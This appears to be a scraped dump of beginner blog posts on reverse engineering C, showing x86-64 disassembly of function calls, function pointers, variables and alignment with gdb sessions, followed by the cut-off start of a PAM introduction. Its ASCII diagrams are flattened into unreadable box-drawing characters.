─ ─ ─ ─ ─ ─ n p r ─ ┌ │ │ │ │ │ │ │ │ │ └ ─ ─ d L ─ ─ ─ ─ ─ ─ o o e ─ ─ ─ ─ ─ w 3 ─ ─ ─ ─ ─ ─ p p t ─ ─ p m m c j ─ ─ ─ o ─ f │ │ │ ┘ ┐ │ ┘ ─ ─ ─ ─ u o o m e ─ ─ ─ r ─ ┐ │ │ │ ─ r ─ ─ s v v p ─ ─ ─ d ─ t │ │ └ ─ b ─ ─ h . ─ ─ ─ ─ ─ ┌ │ │ ─ p ─ ─ r d d L ─ ─ ─ [ ─ ─ ─ ─ ─ ─ r b w w 2 ─ ─ ─ r ─ ─ ┌ │ │ │ └ ─ ┌ │ ─ ─ ─ b p o o ─ f │ │ ┘ ─ b ─ ─ ─ ─ ─ ─ ─ ─ ─ p , r r ─ ─ p ─ ─ ─ m n ─ ─ ─ ─ ─ ─ d d ─ t │ └ ─ - ─ ─ ─ o o ─ ─ ─ ─ ─ ─ r ─ ─ ─ 0 ─ ┐ │ │ │ ─ v p ─ │ │ ┘ ─ ─ ─ ─ s [ [ ─ ─ ─ x ─ ─ ─ ─ ─ ─ ─ p r r ─ ─ ─ 4 ─ ─ d ─ ─ ─ ─ ─ b b ─ ─ ─ ] ─ ─ w ─ ─ ─ ─ ─ p p ─ ─ ─ , ─ ─ o ─ ─ ─ ─ ─ - - ─ ─ ─ ─ ─ r ─ ─ ─ ─ ─ 0 0 ─ ─ ─ 2 ─ ─ d ─ ─ ─ ─ ─ x x ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 4 4 ─ ─ ─ ─ ─ [ ─ ─ ─ ─ ─ ] ] ─ ─ ─ ─ ─ r ─ ─ ─ ─ ─ , , ─ ─ ┐ │ │ │ ┘ ─ b ─ ─ ─ ─ ─ ─ ─ ─ p ─ ─ ─ ─ ─ 1 1 ─ ─ ─ - ─ ─ ─ ─ ─ ─ ─ ─ 0 ─ ─ ─ ─ ─ ─ ─ ─ x ─ ─ ─ ─ ─ ─ ─ ─ 8 ─ ─ ─ ─ ─ ─ ─ ─ ] ─ ─ ─ ─ ─ ─ ─ ─ , ─ ─ ─ ─ ─ ─ ─ ┌ │ │ │ │ └ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 2 ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 0 ─ ─ ─ ─ ─ ─ ─ ─ m j ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ ─ o m ─ │ │ │ └ ─ ─ ─ ─ ─ ─ ─ ─ v p ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ d . ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ w L ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ o 4 ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ r ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ d ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ [ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ r ─ ─ ┐ │ │ │ ┘ ─ ─ ─ ─ ─ ─ b ─ ─ ─ ─ ─ ─ ─ ─ p ─ ─ ─ ┐ │ │ │ │ │ ┘ ─ ─ ─ - ─ ─ ─ ─ ─ ─ 0 ─ ┐ │ │ │ │ │ │ │ │ │ │ ┘ ─ ─ ─ x ─ ─ ─ ─ 8 ─ ─ ─ ─ ] ─ ─ ─ ─ , ─ ─ ─ ─ ─ ┐ │ │ │ │ │ │ │ │ │ ┘ ─ 1 ─ ─ 0 ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ │ ┘ With all that out of the way, let us take a brief look at how function calling works at the low level.\nFunctions I always wished to demonstrate people an infinite loop with recursion. So here you have it.\nvoid main() { main(); } Disassembly:-\nmain: push rbp mov rbp, rsp mov eax, 0 call main nop pop rbp ret Each time the call main instruction is encountered, the main() function is called, and a new function frame is created. Due to the lack of an exit condition, the processor will never be able to read anything beyond the call main instruction, and thus the function will never return. Hence, the infinite loop.\nNow take a look at how things change when we add arguments to a function.\nvoid main() { main(1,2,3,4,5,6,7,8,9,10); } Disassembly:-\nmain: push rbp mov rbp, rsp push 10 push 9 push 8 push 7 mov r9d, 6 mov r8d, 5 mov ecx, 4 mov edx, 3 mov esi, 2 mov edi, 1 mov eax, 0 call main add rsp, 32 nop leave ret If you examine the pattern, you will notice that the arguments are loaded in a particular sequence - from right to left. The first six arguments remain in the registers edi, esi, edx, ecx, r8d \u0026amp; r9d (from left to right). The rest of the arguments are stored on the stack.\nThis pattern is followed by any function that you wish to invoke from your code.\nvoid main() { printf(1,2,3); } Disassembly:-\nmain: push rbp mov rbp, rsp mov edx, 3 mov esi, 2 mov edi, 1 mov eax, 0 call printf nop pop rbp ret This is obviously not the correct method to invoke a printf function. Printf\u0026rsquo;s first argument should be a string (possibly a format string).\nvoid main() { printf(\u0026#34;Hello\u0026#34;); } Disassembly:-\n.LC0: .string \u0026#34;Hello\u0026#34; main: push rbp mov rbp, rsp mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf nop pop rbp ret The Hello string is kept at LC0 offset here. So we load the offset\u0026rsquo;s pointer to value and put it in edi. Then execute the printf() function, which will take as its first argument the value stored in the edi register.\nIf you are wondering what\u0026rsquo;s the point of mov eax, 0 just before printf call\u0026hellip; read this StackOverflow thread 2\nIf we add 1 more argument to printf call, that should be stored in esi register. And the right-most argument will be processed first.\nvoid main() { printf(\u0026#34;%d\u0026#34;, 10); } Disassembly:-\n.LC0: .string \u0026#34;%d\u0026#34; main: push rbp mov rbp, rsp mov esi, 10 mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf nop pop rbp ret Printf, like all other C functions, has a return value that is an int type. Printf gives the number of characters in the format string that the function has processed.\nvoid main() { int x = printf(\u0026#34;%d\\n\u0026#34;, 10); printf(\u0026#34;%d\\n\u0026#34;, x); } Disassembly:-\n.LC0: .string \u0026#34;%d\u0026#34; main: ; Prologue push rbp mov rbp, rsp ; Getting memory block for variables sub rsp, 16 ; first printf mov esi, 10 mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf ; Storing return value (eax) of printf in the local variable mov DWORD PTR [rbp-4], eax ; second printf mov eax, DWORD PTR [rbp-4] mov esi, eax mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf ; epologue nop leave ret Remember how we talked about that the return values from functions are stored in eax register. Here also, the return value from printf is stored in eax which is then stored in some other local variable.\nSince both of my strings for printf were exactly same, the compiler reused it to call printf second time, instead of creating 2 strings with same content.\nFunction pointers Let us spice things up a little more now\u0026hellip; and look at function pointers.\nvoid main() { printf(\u0026#34;%p\\n\u0026#34;, main); printf(\u0026#34;%p\\n\u0026#34;, *main); printf(\u0026#34;%p\\n\u0026#34;, \u0026amp;main); } Output of this program is not what you might expect if you are not a seasoned C programmer or have never worked with function pointers before.\nOutput:-\n0x55770bbfa139 0x55770bbfa139 0x55770bbfa139 Each of them gave the same output. This is not the case when working with integer pointers. Let\u0026rsquo;s see how this looks at lower level\nDisassembly:-\n.LC0: .string \u0026#34;%p\\n\u0026#34; main: push rbp mov rbp, rsp ; printf(\u0026#34;%p\\n\u0026#34;, main); mov esi, OFFSET FLAT:main mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf ; printf(\u0026#34;%p\\n\u0026#34;, *main); mov esi, OFFSET FLAT:main mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf ; printf(\u0026#34;%p\\n\u0026#34;, \u0026amp;main); mov esi, OFFSET FLAT:main mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf nop pop rbp ret They are all precisely the same!! The assembly code for all three lines remains unchanged.\nTo test whether it behaves the same way with other functions as well, let\u0026rsquo;s add another function to the code.\n#include \u0026lt;stdio.h\u0026gt; int func() {} void main() { printf(\u0026#34;%p\\n\u0026#34;, func); printf(\u0026#34;%p\\n\u0026#34;, *func); printf(\u0026#34;%p\\n\u0026#34;, \u0026amp;func); } Disassembly:-\nfunc: push rbp mov rbp, rsp nop pop rbp ret .LC0: .string \u0026#34;%p\\n\u0026#34; main: push rbp mov rbp, rsp ; printf(\u0026#34;%p\\n\u0026#34;, func); mov esi, OFFSET FLAT:func mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf ; printf(\u0026#34;%p\\n\u0026#34;, *func); mov esi, OFFSET FLAT:func mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf ;printf(\u0026#34;%p\\n\u0026#34;, \u0026amp;func); mov esi, OFFSET FLAT:func mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf nop pop rbp ret Still the same!!\nIf you have never worked with function pointers before, this is just the beginning of things, we can even call the function func using above pointer notations.\n#include \u0026lt;stdio.h\u0026gt; void func() {} void main() { func(); (*func)(); (\u0026amp;func)(); } Disassembly:-\nfunc: push rbp mov rbp, rsp nop pop rbp ret main: push rbp mov rbp, rsp ; func(); mov eax, 0 call func ; (*func)(); mov eax, 0 call func ; (\u0026amp;func)(); mov eax, 0 call func nop pop rbp ret We can even add arguments to our func function call, just like we do with a normal function\u0026hellip; and the first argument will be stored in edi the second on in esi and so on.\nint func(int x) { printf(\u0026#34;%d\\n\u0026#34;, x); } void main() { func(5); (func)(6); (*func)(7); (\u0026amp;func)(8); } Disassembly:-\n.LC0: .string \u0026#34;%d\\n\u0026#34; func: push rbp mov rbp, rsp sub rsp, 16 mov DWORD PTR [rbp-4], edi mov eax, DWORD PTR [rbp-4] mov esi, eax mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf nop leave ret main: push rbp mov rbp, rsp ; func(5); mov edi, 5 call func ; func(6); mov edi, 6 call func ; func(7); mov edi, 7 call func ; func(8); mov edi, 8 call func nop pop rbp ret That\u0026rsquo;s it for today. In the next article, I\u0026rsquo;ll try to use all our knowledge we have gathered till now to reverse engineer a very simple calculator program.\nhttps://godbolt.org/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://stackoverflow.com/questions/6212665/why-is-eax-zeroed-before-a-call-to-printf\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2023/04/intro-to-re-part-3/","summary":"In the previous blog, I discussed some of the basic C program\u0026rsquo;s disassembly structures, concentrating on the variables and their memory layouts. This article, a follow-up to the previous one, focuses on basic operations and functions in C programs.\nIn the previous blogs, we have seen what an empty C program looks like\nvoid main() {} Disassembly:\nmain: push rbp mov rbp, rsp nop pop rbp ret Arithmatic operators Now if we want to work with operations, we\u0026rsquo;ll have to add 2 local variables to the function.","title":"Intro to RE: C : part-3"},{"content":"Reverese engineering is a powerful tool for any software developer. However, as with any tool, it is only as good as the person using it. Understanding reverse engineering and how to use it is essential for both novices and seasoned developers.\nAccording to wikipedia,\nReverse engineering, also called back engineering, is the process by which a man-made object is deconstructed to reveal its designs, architecture, or to extract knowledge from the object; similar to scientific research, the only difference being that scientific research is about a natural phenomenon.\nBecause there will be a lot of new things, I\u0026rsquo;m attempting to keep this article more practical and experimental\u0026hellip;I encourage you to follow along and experiment with your own examples as well.\nThe following is a very simple C program that starts the main() function and exits by returning a value 0.\nint main() { return 0; } This source code will be compiled to create an executable binary file. When we disassemble the compiled binary, we get something like this\u0026hellip;\n(Note: There are many disassemblers 1 you can use. Nearly all the disassembled instructions in this blog were produced with godbolt)\nmain: push rbp mov rbp, rsp mov eax, 0 pop rbp ret In this example, function prologue and epilogue are the first two and last two instructions, respectively. These are used to build a frame for a function. This frame contains all of the local variables used or defined in this function.\nWhenever a function is created, a new frame is created, all the local variables are stored in respective memory blocks inside this frame and finally the frame is discarded when the function returns.\nWe\u0026rsquo;ll go into more detail about this later, but for now, just remember that there are prologue and epilogue instructions that mark the beginning and end of a function.\nWith this out of the picture, the instruction at line 4 appears to be in charge of returning 0 to the caller function (whoever called main()).\nThe idea is to use the eax register as a storage area for return values. When a function returns something, it simply stores the value in the eax/rax register so that the caller function can read it later if necessary.\nNow we know some background theory, let\u0026rsquo;s try to change the return value and see how our assembly instructions reflect the change.\nint main(){ return 6; } The assembly instructions for the above code are nearly identical to the previous one, with the exception of the return value at line 4. Now eax register stores the value 6 instead of 0.\nmain: push rbp mov rbp, rsp mov eax, 6 pop rbp ret If you are familiar with basic C programming, you know that we can avoid returning value by changing the return type of the function main() from int to void.\nvoid main() {} No return statements here! So we can safely assume that the disassembly for this function should consist only of a prologue and an epilogue, with no mov eax 0 kind of instructions.\nWhy?? No return statements in the source code, so no need to store anything in eax register. Save some CPU cycles. Makes sense, right? Let\u0026rsquo;s check!!\nmain: push rbp mov rbp, rsp nop pop rbp ret The prologue and epilogue can be seen in the above disassembly, along with a new instruction nop that does nothing. A nop statement in C is a null statement that can be a semicolon (;), an empty block ({}), or any other equivalent statement.\nIf you\u0026rsquo;re a Pythonista, you\u0026rsquo;re already familiar with the pass statement, which has no effect when executed. This serves as a nop in python language.\nIn the disassembly, we now know what the prologue, epilogue, and return statement look like. Let’s see what variables look like when disassembled.\nEverything in the following code is identical to the previous example; the only statement added here is an int variable definition.\nvoid main(){ int a = 1; } We have already established that all the local variables for a function are created inside the function frame (which starts with a prologue and ends with an epilogue). With that in mind, let\u0026rsquo;s take a look at the disassembly for this source code.\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 nop pop rbp ret A new instruction detected - mov DWORD PTR [rbp-4], 1. This is storing value 1 at some location pointed by rbp-4. To gain a better understanding of how that works, we\u0026rsquo;ll have to take a detour so that we can debug the binary and see the registers and memory in action.\nI\u0026rsquo;ll start gdb with the compiled version of the above source code, and then disassemble the main function.\n\u0026gt;\u0026gt;\u0026gt; disas main Dump of assembler code for function main: 0x0000555555555119 \u0026lt;+0\u0026gt;: push rbp 0x000055555555511a \u0026lt;+1\u0026gt;: mov rbp,rsp =\u0026gt; 0x000055555555511d \u0026lt;+4\u0026gt;: mov DWORD PTR [rbp-0x4],0x1 0x0000555555555124 \u0026lt;+11\u0026gt;: nop 0x0000555555555125 \u0026lt;+12\u0026gt;: pop rbp 0x0000555555555126 \u0026lt;+13\u0026gt;: ret End of assembler dump. In this scenario, I\u0026rsquo;m at the mov DWORD PTR [rbp-0x4],0x1 instruction. That means, rip register is pointing to this instruction, which means this will be the next instruction executed by the CPU. We can also confirm this by checking the value stored in rip register.\n\u0026gt;\u0026gt;\u0026gt; p/x $rip $1 = 0x55555555511d See, told ya!\nNow, let\u0026rsquo;s print the value from rbp register to figure out where the 0x1 will be stored eventually.\n\u0026gt;\u0026gt;\u0026gt; p/x $rbp $2 = 0x7fffffffdbd0 \u0026gt;\u0026gt;\u0026gt; p/x $rbp-4 $3 = 0x7fffffffdbcc \u0026gt;\u0026gt;\u0026gt; p/x (int *)($rbp-4) $4 = 0x7fffffffdbcc \u0026gt;\u0026gt;\u0026gt; p/x *(int *)($rbp-4) $5 = 0x7fff The last value is the current value at the location pointed by rbp-4 memory location. Consider the below mindmap diagram to get a clear picture.\nR B ┌ │ │ │ └ P ─ ─ ─ ─ r ─ 0 ─ e ─ x ─ g ─ 7 ─ i ─ f ─ s ─ f ─ t ─ f ─ e ─ f ─ r ─ f ─ ─ f ─ ─ f ─ ─ d ─ ─ b ─ ─ d ─ ─ 0 ─ ─ ─ ─ ─ ┐ │ ├ │ ┘ ─ ─ ─ ─ ─ ─ ┌ │ │ │ │ │ │ │ ┘ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ► 0 0 x x 7 7 f f f f f f f f f f f f f f d d b b d c 0 c ┌ │ │ │ │ │ │ │ │ ├ │ ├ │ ├ │ ├ │ ├ │ │ ├ │ │ │ │ │ │ │ │ │ │ │ │ └ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 0 ─ ─ M ─ ─ ─ ─ ─ ─ x ─ ─ E ─ ─ ─ ─ ─ ─ 7 ─ ─ M ─ ─ ─ ─ ─ ─ f ─ ─ O ─ ─ ─ ─ ─ ─ f ─ ─ R ─ ─ ─ ─ ─ ─ f ─ ─ Y ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ │ │ │ │ │ ┤ │ ┤ │ ┤ │ ┤ │ ┤ │ │ ┤ │ │ │ │ │ │ │ │ │ │ │ │ ┘ │ │ │ │ │ │ │ │ ▼ ( ( r r b b p p ) - 4 ) The rbp register holds a memory location, you subtract 4 from the rbp to make enough space for a int type data and then store the value at that location.\nAfter executing the instruction, we\u0026rsquo;ll get 0x1 in this location.\n\u0026gt;\u0026gt;\u0026gt; si \u0026gt;\u0026gt;\u0026gt; disas main Dump of assembler code for function main: 0x0000555555555119 \u0026lt;+0\u0026gt;: push rbp 0x000055555555511a \u0026lt;+1\u0026gt;: mov rbp,rsp 0x000055555555511d \u0026lt;+4\u0026gt;: mov DWORD PTR [rbp-0x4],0x1 =\u0026gt; 0x0000555555555124 \u0026lt;+11\u0026gt;: nop 0x0000555555555125 \u0026lt;+12\u0026gt;: pop rbp 0x0000555555555126 \u0026lt;+13\u0026gt;: ret End of assembler dump. \u0026gt;\u0026gt;\u0026gt; p/x *(int *)($rbp-4) $7 = 0x1 R B ┌ │ │ │ └ P ─ ─ ─ ─ r ─ 0 ─ e ─ x ─ g ─ 7 ─ i ─ f ─ s ─ f ─ t ─ f ─ e ─ f ─ r ─ f ─ ─ f ─ ─ f ─ ─ d ─ ─ b ─ ─ d ─ ─ 0 ─ ─ ─ ─ ─ ┐ │ ├ │ ┘ ─ ─ ─ ─ ─ ─ ┌ │ │ │ │ │ │ │ ┘ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ► 0 0 x x 7 7 f f f f f f f f f f f f f f d d b b d c 0 c ┌ │ │ │ │ │ │ │ │ ├ │ ├ │ ├ │ ├ │ ├ │ │ ├ │ │ │ │ │ │ │ │ │ │ │ │ └ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 0 ─ ─ M ─ ─ ─ ─ ─ ─ x ─ ─ E ─ ─ ─ ─ ─ ─ 1 ─ ─ M ─ ─ ─ ─ ─ ─ ─ ─ O ─ ─ ─ ─ ─ ─ ─ ─ R ─ ─ ─ ─ ─ ─ ─ ─ Y ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ │ │ │ │ │ ┤ │ ┤ │ ┤ │ ┤ │ ┤ │ │ ┤ │ │ │ │ │ │ │ │ │ │ │ │ ┘ │ │ │ │ │ │ │ │ ▼ ( ( r r b b p p ) - 4 ) This should give you a little idea of how the references work and where does the 0x1 is actually stored.\nWith that out of our plate, let\u0026rsquo;s get back to the original instruction in question - mov DWORD PTR [rbp-4], 1. This instruction surely stores the value 0x1 in the location pointed by rbp - 4 memory location.\nThen there is the same old nop and epilogue. Nothing new here. Let\u0026rsquo;s add more variables to the function.\nvoid main() { int a = 1, b=2, c=3, d=4; int e = 5; } Below is the disassembly for this\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 mov DWORD PTR [rbp-12], 3 mov DWORD PTR [rbp-16], 4 mov DWORD PTR [rbp-20], 5 nop pop rbp ret Each variable is created in sequence and have a space of 4 bytes to save an int type data in it. Int data types have a size of 4 bytes, so this makes sense.\nAnother commonly used data type is char, which requires a smaller size than int, 1 byte in total.\nvoid main(){ char a = 1, b=2, c=3, d=4; char e = 5; } Yes, the above program is completely correct from the standpoint of a compiler. When storing data in char types, we don\u0026rsquo;t always need single quotes.\nAnyway, the disassembly for this is as follows:-\nmain: push rbp mov rbp, rsp mov BYTE PTR [rbp-1], 1 mov BYTE PTR [rbp-2], 2 mov BYTE PTR [rbp-3], 3 mov BYTE PTR [rbp-4], 4 mov BYTE PTR [rbp-5], 5 nop pop rbp ret There is now a noticeable difference between this disassembly and the previous one. The DWORD has been changed to BYTE in this case, which means that less memory is required to store this data, as evidenced by the memory locations used for storage - rbp-1, rbp-2, and so on - each of which has only 1 byte of storage.\nFun thing, with the help of some computer maths, we can find out that the highest number that can be stored in 1 byte storage location is 127. So if we store any number bigger than this, it\u0026rsquo;ll start shifting to the negative range and then loop back.\nvoid main(){ char a = 127; char b = 128; char c = 129; char d = 130; } disassembly for this code:-\nmain: push rbp mov rbp, rsp mov BYTE PTR [rbp-1], 127 mov BYTE PTR [rbp-2], -128 mov BYTE PTR [rbp-3], -127 mov BYTE PTR [rbp-4], -126 nop pop rbp ret Good, now we also know how int and char looks like in their disassembly output. Let\u0026rsquo;s mix things up a bit to level up and learn something new.\nvoid main(){ char a = 127; char b = 128; char c = 129; char d = 130; int e = 131; } 4 char and then 1 int.\nrbp-1 for a. rbp-2 for b. rbp-3 for c. rbp-4 for d. rbp-8 for e. Because int takes 4 bytes (This can depend on the OS, architecture and compiler you are using). Let\u0026rsquo;s check the disassembly to see if we got this right or not.\nmain: push rbp mov rbp, rsp mov BYTE PTR [rbp-1], 127 mov BYTE PTR [rbp-2], -128 mov BYTE PTR [rbp-3], -127 mov BYTE PTR [rbp-4], -126 mov DWORD PTR [rbp-8], 131 nop pop rbp ret Woohooo!!\nThough there is one thing I want you to notice\u0026hellip; The int value did not follow the same pattern as char values because char is smaller in size and cannot store a very large value, whereas int is comparatively larger and can store the assigned value without any storage issues. As a result, the int value remained unchanged from the source code, while the char values became negative.\nNow, let\u0026rsquo;s change the order of the variables and see how it gets interesting.\nvoid main(){ char a = 127; char b = 128; int e = 131; char c = 129; char d = 130; } disassembly for this code:-\nmain: push rbp mov rbp, rsp mov BYTE PTR [rbp-1], 127 mov BYTE PTR [rbp-2], -128 mov DWORD PTR [rbp-8], 131 mov BYTE PTR [rbp-9], -127 mov BYTE PTR [rbp-10], -126 nop pop rbp ret Well, you can see the size needed for each variable has changed. It\u0026rsquo;s time to be aware of a concept called Data structure alignment.\nAccording to wikipedia,\nThe CPU in modern computer hardware performs reads and writes to memory most efficiently when the data is naturally aligned, which generally means that the data\u0026rsquo;s memory address is a multiple of the data size. For instance, in a 32-bit architecture, the data may be aligned if the data is stored in four consecutive bytes and the first byte lies on a 4-byte boundary.\nRead this article 2 to gain better understanding of data alignment and why is it even a concerning thing for us.\nFor now, just know that usually 64-bit CPUs have a native 4-byte load. That means, it can pick up 4 bytes in a single turn and use them for something.\nLet\u0026rsquo;s visualize the memory layout for the variables in above code.\n┌ │ │ │ ├ │ │ │ ├ │ │ │ ├ │ │ ─ ─ ─ ─ 1 ─ 1 ─ ─ - ─ ◄ ─ 2 ─ ─ 1 ─ ─ ◄ ─ 7 ─ ─ 2 ─ ─ ─ ─ ─ ─ 7 ─ ─ ─ ┬ │ │ │ ┴ ┬ │ │ │ ┼ │ │ ─ 4 ─ ─ ─ ─ ─ ─ ─ ─ - ─ ─ - ─ l ─ b ─ 2 ─ 1 ─ ─ 1 ─ o ─ y ─ ─ 2 ─ ─ 2 ─ a ─ t ─ ─ 8 ─ 1 ─ 6 ─ d ─ e ─ ┬ │ │ │ ┴ 3 ┬ │ │ │ ┼ │ │ s ─ s ─ ─ ─ 1 ─ ─ ─ ─ ─ ─ ─ ─ l ─ ─ 3 ─ ─ ─ ─ i ─ ─ ─ ─ ─ ─ k ─ ─ ─ ─ ─ ─ e ─ ─ ┬ │ │ │ ┴ ┬ │ │ │ ┼ │ │ ─ ► ─ ─ ─ ─ t ─ ─ ─ ─ ─ h ─ 4 ─ ─ ─ ─ i ─ ─ ─ ─ ─ s ─ ─ ─ ─ ─ ─ ┐ │ │ │ ┤ │ │ │ ┤ │ │ │ ┤ │ │ │ │ ┘ The above diagram of memory is aligned in a 4 byte load. The first 2 variables are a BYTE type so the values are places in the first 2 blocks of the first row. Next variable is an INT type, which is equivalent to 4 bytes. But there are no 4 bytes available in the first row, so in order to keep the atomicity, this variable was stored in the next row. (WHY atomicity??)\nSo does it mean that we have that 2 bytes space just lying there?? - YES! you can use it if you want. Take a look at the below source code.\nvoid main(){ char a = 127; char b = 128; char x = 111; char y = 112; int e = 131; char c = 129; char d = 130; } main: push rbp mov rbp, rsp mov BYTE PTR [rbp-1], 127 mov BYTE PTR [rbp-2], -128 mov BYTE PTR [rbp-3], 111 mov BYTE PTR [rbp-4], 112 mov DWORD PTR [rbp-8], 131 mov BYTE PTR [rbp-9], -127 mov BYTE PTR [rbp-10], -126 nop pop rbp ret No change in the layout\u0026hellip; variable x and y will fill up the 2 Bytes space that were just lying there to be used.\nBut if we add 1 more variable z, then the whole thing moves.\nvoid main(){ char a = 127; char b = 128; char x = 111; char y = 112; char Z = 123; int e = 131; char c = 129; char d = 130; } main: push rbp mov rbp, rsp mov BYTE PTR [rbp-1], 127 mov BYTE PTR [rbp-2], -128 mov BYTE PTR [rbp-3], 111 mov BYTE PTR [rbp-4], 112 mov BYTE PTR [rbp-5], 123 mov DWORD PTR [rbp-12], 131 mov BYTE PTR [rbp-13], -127 mov BYTE PTR [rbp-14], -126 nop pop rbp ret If you are still visualizing the way I displayed above, now we have 3 bytes space in the row 2. This space is added by the compiler and is termed as padding. We can not always avoid padding, but a good programmer can arrange the variables in a way to minimize this.\nThat was a long detour, but definetily worth it. I\u0026rsquo;ll cover more examples in later parts of this series. Till then, ciao!!\nhttps://en.wikipedia.org/wiki/Disassembler#Examples_of_disassemblers\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://developer.ibm.com/articles/pa-dalign/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2023/03/intro-to-re-part-2/","summary":"Reverese engineering is a powerful tool for any software developer. However, as with any tool, it is only as good as the person using it. Understanding reverse engineering and how to use it is essential for both novices and seasoned developers.\nAccording to wikipedia,\nReverse engineering, also called back engineering, is the process by which a man-made object is deconstructed to reveal its designs, architecture, or to extract knowledge from the object; similar to scientific research, the only difference being that scientific research is about a natural phenomenon.","title":"Intro to RE: C : part-2"},{"content":"PAM - What and Why Authenticating a user to a service used to be a time-consuming process. The application had to be aware of all possible authentication mechanisms and had to be rebuilt every time a new authentication method was introduced\u0026hellip; As a result, there was a significant amount of code repetition. Naturally, it was disliked by everyone!!\nAs a result, the concept of a middle-ware application responsible for user authentication to a service arose. And, Pluggable Authentication Modules (PAM), a collection of modules that act as a barrier between a service on your system and the service\u0026rsquo;s user, were created.\nModules can include a variety of functions, such as disabling login for specific users/groups, limiting resources, audting, and so on. PAM is now supported by the vast majority of major unix flavours, including AIX, HP-US, FreeBSD, and nearly all Linux distributions.\nThe big advantage here is that security is no longer a concern for the application: if PAM says \u0026ldquo;it\u0026rsquo;s OK\u0026rdquo;, it\u0026rsquo;s OK. That simplifies things for both the application developer and the system administrator.\nUnderstanding PAM According to man (8) pam,\nLinux-PAM is a system of libraries that handle the authentication tasks of applications (services) on the system. The library provides a stable general interface (Application Programming Interface - API) that privilege granting programs (such as login(1) and su(1)) defer to to perform standard authentication tasks.\nThese libraries are typically configurable via defined arguments or dedicated configuration files. Internal behavior of the Linux-pam library is trivial from the standpoint of a sysadmin. The key point is to define the relationship between applications and the PAM.\nThe below diagram gives an idea of how PAM works.\n┌ │ │ │ │ ├ │ └ ─ ─ ─ ┌ │ │ │ │ └ ─ ─ p ─ ─ ─ ─ ─ a ─ ─ / / ─ ─ ─ m ─ ─ e e ─ ─ ─ _ ─ ─ t t ─ ─ ─ u ┬ │ │ │ ▼ ─ c c ─ ─ ─ n ─ ─ / / ─ ┌ │ │ │ └ ─ ─ i ─ ─ p s ─ ─ ─ ─ ─ x ─ ─ a h ─ ─ ┬ │ │ │ │ │ │ ▼ ─ ─ . ─ ─ s a ─ ─ ─ ─ ─ s ─ ─ s d ─ ─ A ─ ─ ─ o ─ ─ w o ─ ─ P ─ ─ ─ ─ ─ d w ─ ─ P ─ ─ ┬ │ ┴ ─ ─ ─ ─ ▲ │ │ │ │ │ │ ┴ ─ ─ ┐ │ │ │ │ ┘ ─ 1 ─ ─ ─ ─ ─ ─ ─ ─ p ─ ─ ─ ─ ─ a ─ ┌ │ │ │ │ └ ─ ─ ─ ─ m ─ ─ ─ ┐ │ │ │ ┘ ─ ─ _ ─ ─ ─ ─ ─ l ─ ─ ─ ─ ─ d ┬ │ │ │ ▼ ─ ─ ─ ─ a ─ ─ L ─ ─ ─ p ─ ─ D ─ ─ ─ . ─ ─ A ─ ─ ─ s ─ ─ P ─ ─ ─ o ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┬ │ ┴ 